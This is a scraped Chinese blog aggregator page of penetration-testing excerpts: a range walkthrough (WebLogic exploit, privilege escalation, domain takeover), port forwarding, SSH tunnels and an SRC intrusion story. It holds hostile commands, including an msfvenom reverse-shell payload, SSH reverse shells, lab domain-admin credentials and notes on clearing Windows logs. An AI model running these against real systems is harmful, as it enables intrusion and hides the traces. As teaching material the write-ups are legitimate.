精华内容
下载资源
问答
  • 为了此次打靶,23g的文件,特地开了百度云会员来下载,17号晚上下载,18号一觉醒来发现下载完毕,老衲的10块钱会员钱还是没白花,于是就开始了打靶之旅,下面将记录此次打靶的所有细节所遇到的问题。大佬笑笑经过...

    0x00 前言

             疫情期间,在家无聊,闲的腚疼,就开始打靶。为了此次打靶,23g的文件,特地开了百度云会员来下载,17号晚上下载,18号一觉醒来发现下载完毕,老衲的10块钱会员钱还是没白花,于是就开始了打靶之旅,下面将记录此次打靶的所有细节和所遇到的问题。大佬笑笑经过就好,小白的话就认真学习,相信此次打靶还是有一定技术性的提升。

    整个网络拓扑图如下:

    0x01 安装

             前面的细节无非就是三个压缩包,分别为WEB、DC、PC。解压完毕,打开落满尘灰的虚拟机,兴致勃勃的将解压好的文件放入虚拟机,然后准备打开,结果开始报错(然后这也是此次打靶遇到的问题之一),看图:

    于是傻乎乎的我就开始询问各位大佬,然后大佬告诉我是我电脑系统问题,说我的系统不支持虚拟机。我笑了,连忙问号三连表示友好(???)。

    我连忙拿起旁边的红酒杯,那里面可是装了沉浸80多年的白开老白干,一口下去,灵光一现,脑壳中一位美丽的女子一丝不挂的出现在我的脑海,我口水直流三尺,甚至还硬了,突然……我。对不起,跑题了,然后我将虚拟机配置文件里面的版本号修改为我现在虚拟机的版本号,然后再次打开,问题就解决了。

             当三个靶机(web、dc、pc)全部安装完成后,于是开始配置ip,这里面似乎并没有遇到多大的问题,对不起,突然下面一硬,问题来了,我发现他们之间,内网地址互ping不通,我开始焦虑,我开始脱发,不,我是安全人员,我不能这样,我要解决它!当我重启了一下,结果就能ping通了,很神奇对不对,我也这么觉得。

    顿时就很开心,然后问题又来了,我发现外网,也就是我本机,作为攻击机器,并不能与web端机器ping通,脑袋一热,直接把web端选择为NAT模式自动获取ip(因为WEB端其中一块网卡是可以访问外网的),继续ping,发现ping还是不同,就去查看(防火墙),发现是策略问题,就直接将防火墙关闭(并没有关闭域之间的防火墙),发现可以ping通,开始打靶。

    0x02 WEB渗透

             兴致勃勃的拿到靶机ip(web),192.168.229.128,操起宝刀,移步进入kali(攻击机器),开始进行一波初始的信息收集,使用nmap扫描一下目标ip端口信息,详情如下:

    看靶场的说明,我们首先要打开weblogic(使用管理员权限)。

    然后看到几个比较感兴趣的端口80(http)、1433(mssql)、3389(rdp)、7001(weblogic)。

             于是一一去探测,第一想法就是在80入口,第二是7001端口,后面的通过1433弱口令传马和3389选择去rdp爆破。

             1.80访问失败。

             2.7001(weblogic)显示404。

             3.1433和3389弱口令均爆破失败。

    回头继续看2、7001(weblogic),虽然是404,但是肯定存在站点,只是文件不存在,脑海中一热,就想做个工具人,去dirbrute爆破一波目录和文件,突然一硬,阻止了我这种工具人的想法,就去手工探测,发现没有什么效果,于是去问百度,发现默认地址不对,于是按照百度说的,目标站点出现了。站点路径:

    http://192.168.229.128:7001/console/login/LoginForm.jsp

    1. 先开始尝试weblogic的弱口令,手动weblogic | 12345678,进不去,开始burp抓包进行爆破,白搭,爆破不进去,当然进去我也忘记怎么拿shell,毕竟好久没见了
    2. 开始网上搜索关于weblogic的各种漏洞,然后就找到了POC工具,检测weblogic漏洞工具,地址附上:https://github.com/rabbitmask/WeblogicScan

    1. 通过POC测试,存在CVE-2019-2725,直接根据漏洞上工具(合理的做好一名脚本小子)

    成功getshell,密码:pass,使用冰蝎连接,shell地址:

    http://192.168.229.128:7001//_async/adminxe.jsp

    1. Shell成功拿下,继续进行后渗透

    0x03 内网信息收集

    1. 通过arp –a,进行初步的内网探测

    存在内网环境:

    10.10.10.10

    10.10.10.80

    10.10.10.201

    1. 进一步探测信息,查看是否存在域内环境,通过命令:net time /domain 查看域内解析服务器的时间,确定域控,结果返回系统错误(很明显权限不够)

    Whoami,查看shell权限,发现为administrator权限,并非最高权限

    1. 通过systeminfo尽可能多的收集机器信息

    经过查看存在域,de1ay.com,并且得到补丁程序编号,补丁只打了3个,可通过补丁信息对比继续提权

    1. 当我们得知这是域环境,那么我们的目标肯定是获得DC中域管的权限,最终拿下整个域。(这里呢,我跳过了一系列的提权工具,经过尝试也是可以的),为了后渗透的完整性,我选择CS(Cobalt Strike)进行图形化界面的渗透。

    CS生成木马—>上传到shell—>执行木马—>上线,进行下一步的渗透。

    1. 开始进行提权,方便下一步的操作

    利用ms14-058,成功获取权限

    方便于维权和防止shell掉线,我们使用注入进程功能,会生成一个新的会话

    1. 我们是用portscan功能,继续探测域内主机存活情况

    1. 继续进行域内的信息收集,开始定位域控(这里假装我们看不到名字DC,嘻嘻),然后使用命令:net group “domain controllers” /domain

    可以确定DC为:10.10.10.10

    1. 定位域管理员:net group “domain admins” /domain

    确定域管为:de1ay/Administrator

    9.通过前面的信息收集已经有了一个大概的范围,然后刚才我发现,通过ping的时候80可以和10(DC)通,80(WEB)不可以和201(PC)通,10可以和80和201都通,那么我们确定,想到获取到PC的权限,需要先get到DC的权限(通过10做DL,链接201)

    0x04 横向移动

    1.这里呢,我们已经拿到了域管的账号和明文密码:

    账号:DE1AY\Administrator

    密码:1qaz@WSX

    直接利用流量DL,将80(WEB)dl到本地,然后去登陆10.10.10.10(DC)

    通过dsa.msc

    可以查看域内的机器和域内账户,相当于拿到了整个域的控制权

    2.这里呢,方便保存域内账户信息,我们使用csvde进行保存域内账户信息,便于对其他机器的渗透

    3.然后我们下一步,还是像刚才说的,拿到DC并不算完结,我们的目标在于进入PC,所以这里,我们并不能直接通过80(web)DL到201(PC)上面去(因为80和201不通),这里,我选择socks多层跳板来进行获取PC的权限,于是到这里还是说一下msf的socks DL。这里msf上线过程就不细说,基本和cs一样,生成木马,上传到shell端运行,得到shell

    4.首先我们要添加路由:

    run autoroute  -s 10.10.10.0/24  #添加到路由

    run autoroute –p #查看路由

    成功添加路由后,即可使用auxiliary/server/socks4a进行DL操作,然后我们要通过DC(10.10.10.10)做跳板进行DL,所以我们要先获取DC的shell

    暂时写到这里,思路很清晰了。只是说这个网络环境不是很稳定,真的很难受。

    展开全文
  • 关于内网渗透其实方法思路以及要注意的点内容非常多,又是一个大坑,我就暂且先从三个情况下分别整理一种方法,大概了解一下,先挖个坑哈,手里还有资料但太乱了,之后我再整理吧(真的很多,不是我偷懒,看的眼都...

    浅析内网渗透

    关于内网渗透其实方法和思路以及要注意的点内容非常多,又是一个大坑,我就暂且先从三个情况下分别整理一种方法,大概了解一下,先挖个坑哈,手里还有资料但太乱了,之后我再整理吧(真的很多,不是我偷懒,看的眼都晕了,感觉就是一套全新的渗透测试那么多)
    在这里插入图片描述

    前瞻

    先回看一下之前的几个小思路吧

    Webshell如何开启3389服务

    1、通过修改注册表开启远程终端,详情请看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
    2、通过3389工具开启远程终端
    3、数据库可以开
    4、上传exe可以开

    服务器端口被修改如何查找

    注册表读取、
    端口扫描、
    命令探针查找修改后的端口

    外到内渗透连接

    拿到webshell,服务器处于内网(没有公网地址)的情况下如何远程连接

    1、通过lcx工具解决内网远程连接

    把lcx传到远程服务器去
    原理就是把目标机端口转发到自己公网IP的端口
    Webshell上执行:lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389
    将本机3389端口流量转发到公网ip的2222端口上去
    自己的电脑里面执行:lcx.exe -listen 2222 4444
    监听本地的2222端口将流量转发到4444
    然后连接127.0.0.1 4444

    缺陷

    可能在公司里实际渗透测试过程中,你是在内网中的,同时你无法操控路由器,没有公网地址
    解决就通过下面讲的服务器处于内网远程连接

    内到内渗透连接

    两台电脑分别在各自的内网怎么连接

    通过端口转发脚本解决内网远程连接
    通过reDUH
    选择对应语言的文件上传
    访问一下
    通过设置,将本地3389映射到1234上
    访问127.0.0.1 1234

    内网渗透测试

    在上面我们讲到的都是单端口转发,那么如何扩大战果,得到与目标机同一公网下的其他主机的权限呢

    环境准备

    两台虚拟机
    两个网卡
    一个处于lan区段1
    另一个nat模式映射到公网

    方法:需要两个工具结合

    reGeorg

    把tunnel.php传到服务器
    本地执行cmd

    reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.0.102:8080/tunnel.nosocket.php
    

    让内网之间构成一个通道

    Proxifier

    代理工具装在本机
    设置地址127.0.0.1端口跟上面对应
    协议选择

    socks协议
    各种协议都支持
    https协议
    web

    配置代理规则

    本地所有数据包都走socks
    通过它转发本地所有流量

    补充

    关于burp+Proxifier结合抓包

    有很多APP现在是防代理的或者黑名单防御,比如微信
    但是抓包中间加一个环节使用这个软件 就可以应对了
    因为socks是很正规的

    方法
    在电脑上装模拟器
    把burp ca证书丢在模拟器里加载
    设置规则 新建规则 让模拟器这个进程所有数据包走socks就可以了
    注意 结合使用的工具不要进行拦截 要选择direct模式
    访问验证

    展开全文
  • 渗透开始 WEB撕口子: Web方面的突破口是一个OA系统 致远OA嘛大家都知道,网上复现教程也特别多所以就不在多啰嗦了直接上EXP利用,(工具是本人自己写的哈),地址是各OA-EXP 传完马子冰蝎连接准备...

    雨笋教育小编来给大家分享干货了,由于最近某SRC开启众测福利,所以咱就跟着挖个洞,写篇文章,一举两得。(厚码见谅)嘿嘿


    渗透开始

    WEB撕口子:
    Web方面的突破口是一个OA系统

     

    致远OA嘛大家都知道,网上复现教程也特别多所以就不在多啰嗦了直接上EXP利用,(工具是本人自己写的哈),地址是各OA-EXP

     


    传完马子冰蝎连接准备后续操作

     


    到这里本想添加个用户直接远程登陆服务器了,但是遇到了点问题远程桌面没开启(也可能是换了端口)

     


    然后我们试着找找rdp服务看看是否启用,端口是多少

    tasklist /svc | find "Ter"

    这里我们发现RDP服务存在,端口被改成了3308

    内网部分:
    用IP:3308登陆结果还是拒绝连接,这时候怀疑是只允许内网登陆,我们用MSF生成个马子,先上线MSF再说

    msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=MSFIP地址 LPORT=端口 -f exe -o /root/vhs.exe

    然后开启监听并将root目录下生成的马子上传到目标中运行
    监听:

    msf6> use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 127.0.0.1msf6 exploit(multi/handler) > set lport 3080msf6 exploit(multi/handler) > exploit

    上线以后查看系统信息,权限等



    发现是用户权限,使用默认的提权来试试,直接OK...

     

    接下来搭建个socks5隧道,以便内网横向啥的。这里我使用的是NPS隧道,这个在Github上开源的项目,这里就不细说了。


    搭建好隧道以后使用proxychains连接socks隧道,此时我们MSF机器的IP已经变成目标机的IP地址了

     

    这次使用内网的IP登陆远程桌面,已经发现可以登陆了

     

    MSF接着信息收集,扫描内网主机发现没域控,那就直接用目标的cmd一句话探测了

     

    C:\Windows\system32>for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"Reply from 192.168.*.21: bytes=32 time<1ms TTL=128Reply from 192.168.*.22: bytes=32 time<1ms TTL=128Reply from 192.168.*.100: bytes=32 time<1ms TTL=128Reply from 192.168.*.101: bytes=32 time<1ms TTL=128Reply from 192.168.*.102: bytes=32 time<1ms TTL=128Reply from 192.168.*.103: bytes=32 time<1ms TTL=64Reply from 192.168.*.105: bytes=32 time<1ms TTL=128Reply from 192.168.*.106: bytes=32 time<1ms TTL=128Reply from 192.168.*.107: bytes=32 time<1ms TTL=128Reply from 192.168.*.108: bytes=32 time<1ms TTL=64Reply from 192.168.*.150: bytes=32 time<1ms TTL=128Reply from 192.168.*.151: bytes=32 time<1ms TTL=128Reply from 192.168.*.155: bytes=32 time<1ms TTL=128Reply from 192.168.*.187: bytes=32 time<1ms TTL=128Reply from 192.168.*.188: bytes=32 time<1ms TTL=128Reply from 192.168.*.189: bytes=32 time<1ms TTL=128Reply from 192.168.*.201: bytes=32 time<1ms TTL=128Reply from 192.168.*.254: bytes=32 time<1ms TTL=255Reply from 192.168.*.254: bytes=32 time<1ms TTL=255

    通过TTL可以看到应该两台Linux机器,直接SSH连接,密码123456789登陆成功。。。

     

    Windows也一样,密码123456789图就不贴了没意思。。

    成果


    避免影响人家业务就没有进行批量端口扫描等大量占用带宽的行为就只测了常用端口
    弱口令拿下两台内网Linux服务器
    弱口令拿下多台Windows服务器
    内网弱口令拿下两个后台管理系统


    修复建议
    问题漏洞已提交厂商

    然后欢迎也大家跟我一起交流学习,文章有哪里不足请各位大佬多多包涵

    本文来源:网络

    跟着大佬挖漏洞,渗透测试基础公开课记得看:

    https://ke.qq.com/course/3383785?quicklink=1

    展开全文
  • 今天又是很累很累的一天,又是训练什么的,气死我了。真的希望这种官僚主义能够...我们在web服务器端输入:ssh –CNfL 0.0.0.0:7777:10.10.10.128:80 (web服务器当前用户,eg:xyy)@192.168.0.144(当前web服务器ip..

    今天又是很累很累的一天,又是训练什么的,气死我了。真的希望这种官僚主义能够狗带!先上拓扑图:

     

    话不多说,我之前学到了提权那里,也就意味着,我们已经有了一台内网主机的root权限,这个时候,我们往往想着能攻下整个内网。也就是扩大战果。但是这需要做很多提前准备工作。。。。比如ssh隧道。

     一、SSH正向连接

    我们在web服务器端输入:ssh –CNfL 0.0.0.0:7777:10.10.10.128:80 (web服务器当前用户,eg:xyy)@192.168.0.144(当前web服务器ip)

    这条命令的意思是是:-C:压缩传输数据     N:带端口转发   f:在执行命令前退回后台,不容易被入侵者发现吧我想    L:主机:端口:主机端口 将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

    把web服务器的7777端口和目标数据服务器(公网ip10.10.10.128)的80端口映射,相当于在这两个地方建立了一个ssh隧道。然后在kali黑客的浏览器访问192.168.0.144:7777。即可。

    二、SSH反向连接(较为常用)

    ssh -qTfnN -R port:host:hostport  remote_ip

    ssh –qTfnN –R 2222:127.0.0.1:22  (攻击机的用户)@192.168.0.115

    ssh –p 2222 (主动去连接攻击机的web服务器,这台机子的用户(也就是web服务器的用户))@127.0.0.1

    -q:quit,静音模式,去除警告信息    -T:禁止分伪终端  -R 反向连接getshell,反弹shell   以上命令的意思是:本机的2222端口,经ssh通道主动反弹一个shell给kali的root用户的22端口

    但是!!!!!

    需要注意的是,两台建立ssh通道的机子必须都开放ssh服务, etc/init.d/ssh start

    这里你可能会问?为何正向连接只需要输入一个密码,但是反向连接却需要两个用户都……可以参考ssh的连接方式中密钥的2种交换方式:https://zhuanlan.zhihu.com/p/46235721 

    其中OpenSSL这个方式可以了解一下,貌似打靶机时候用得到。

    三、SSL代理

    SSH -qTfnN -D port remotehost

    原理如上图,试想,如果吧web服务器当做黑客的代理会如何???整个内网岂不是都沦陷了??哈哈哈哈

     

     

     

     

     

     

     

    展开全文
  • 内网渗透讲义(1).pdf

    2020-06-30 14:24:27
    在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大...
  • 内网渗透

    千次阅读 多人点赞 2020-10-04 06:26:56
    目录什么是外网渗透什么是内网渗透域工作组 什么是外网渗透 外网更侧重于找漏洞寻找突破口 举个简单的例子: 把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。 想要进入超市,这个...
  • 在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。无论是Linux还是Windows系统都可以使用,而且是默认安装的。 ftp使用...
  • 记一次从web内网渗透

    千次阅读 多人点赞 2021-09-28 17:08:33
    记一次从web内网渗透 拓扑图 环境介绍 现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功...
  • 让小白测试人员在面对一个web系统和内网系统时有一个基本的思路,方便后续深入学习web渗透和内网渗透。 适用人群        IT从业者、信息安全爱好者、互联网运维等 课程介绍  &...
  • 手把手教你如何进行内网渗透

    万次阅读 多人点赞 2021-11-18 12:36:48
    内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么...
  • 渗透测试--内网渗透

    2020-12-12 08:29:47
    第二种方法:通过reGeorg+Proxifier进行内网渗透,把tunnel.nosocket.php脚本通过Webshell上传到Web站点目录进行访问,在本地自己电脑上面执行reGeorgSocksProxy.py -p 9999 –u http://IP地址/tunn
  • 内网渗透流程1 前提2 实验环境2.1 建立 meterpreter 反向连接2.2 收集信息提升权限2.3 持久后门: 添加隐藏用户2.4 添加内网路由2.5 扫描内网存活主机2.6 扫描内网主机开放的端口2.6.1 使用 SOCKS 后nmap 扫描报错2.7...
  • 内网渗透系列:横向渗透方法小结

    千次阅读 2021-08-03 10:24:28
    本文学习并小结下横向渗透的方法
  • 内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
  • 本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述,从本站的角度来看,存在MSSQL、MYSQL支持ASPXPHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。没现有SUMYSQL之类的信息...
  • Schedluler服务日志在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent 2、Windows日志清除 参考:渗透技巧——Windows日志的删除与绕过 (1)wevtutil.exe 支持系统:Win7及以上 获取日志分类列表...
  • 内网渗透 | 手把手教你如何进行内网渗透

    千次阅读 多人点赞 2020-11-23 21:33:36
    0x3.1 web渗透 or MS17_010 0x3.2 内网探测+跳板代理链 0x4 第三层内网渗透 0x5 总结 0x5.1 跳板总结 0x5.2 内网探测 0x5.3 后话 0x01 DMZ渗透 首页 看到DMZ开启了web服务,是一个typec...
  • 下面开始内网渗透测试 实验环境:VMware中的两台xp系统(SP3),hydra爆破工具 1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ...
  • 内网渗透测试之域渗透详解

    千次阅读 2019-03-28 16:53:07
    内网渗透测试之域渗透详解 转自:https://www.freebuf.com/company-information/172630.html 在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web...
  • 内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取高权限。 在进行内网渗透之前需要了解...
  • 参考链接:搭建mono防火墙视频教程 ...增加规则,拒绝web服务器向外连接 此时web主机可访问内网,不可访问外网,但可访问内网 至此环境测试成功
  • 渗透的基本流程 渗透一般分为如下九步 1.明确目标 要清楚自己扫描的范围,不做超出自己许可之外的扫描,如果有的操作可能引起业务的中断,药剂师联系客户 2.分析风险,获得授权 在扫描开始前要撰写扫描许可书,经过...
  • 内网渗透综述

    千次阅读 2021-12-01 23:25:29
    一、什么是内网渗透 二、内网基础知识 三、内网渗透基本流程 一、什么是内网渗透 内网是一个只有组织工作人员才能访问的专用网络,简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型...
  • 与《内网渗透系列:内网穿透(隧道)学习》可以互相补充
  • web渗透测试

    2021-08-05 18:04:16
    Web渗透测试基本流程 对于web应用的渗透测试,大致可分为三个阶段:信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程,以下通过9个阶段来描述渗透测试的整个流程: 1.明确目标 1)确定范围:...
  • CTF内网渗透笔记

    千次阅读 2020-11-10 15:29:41
    查看用户相关信息 cat /etc/passwd 查找用户相关文件 find / -user root 2>/dev/null 下载靶机可疑文件 #192.168.0.102为kali攻击机ip scp /root/pass/password.txt root@192.168.0.102:/root/ 7、内网渗透 反弹...
  • 通过WIFI渗透内网服务器主机

    千次阅读 2020-10-26 12:37:05
    测试目的:通过WIFI渗透内网,并对内网进行扫描,收集设备信息,并尽可能的拿到多的权限。 测试设备:两台笔记本电脑 :PC1, PC2 ; 一个USB无线网卡RT5572; 一个无线AP 测试环境:PC1 WIN10系统,安装虚拟机KALI,...
  • 内网渗透横向攻击流程

    千次阅读 多人点赞 2021-09-16 19:44:16
    拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) ...Web渗透 目录扫描 使用dirbuster工具扫描网站根目录 设置kali默认字典文件/usr/share/wordlists/dirbuster/directory­list­lowercase­2
  • 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 【查看资料】 1、进去一看,典型的sql注入 2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 6,315
精华内容 2,526
关键字:

web渗透和内网渗透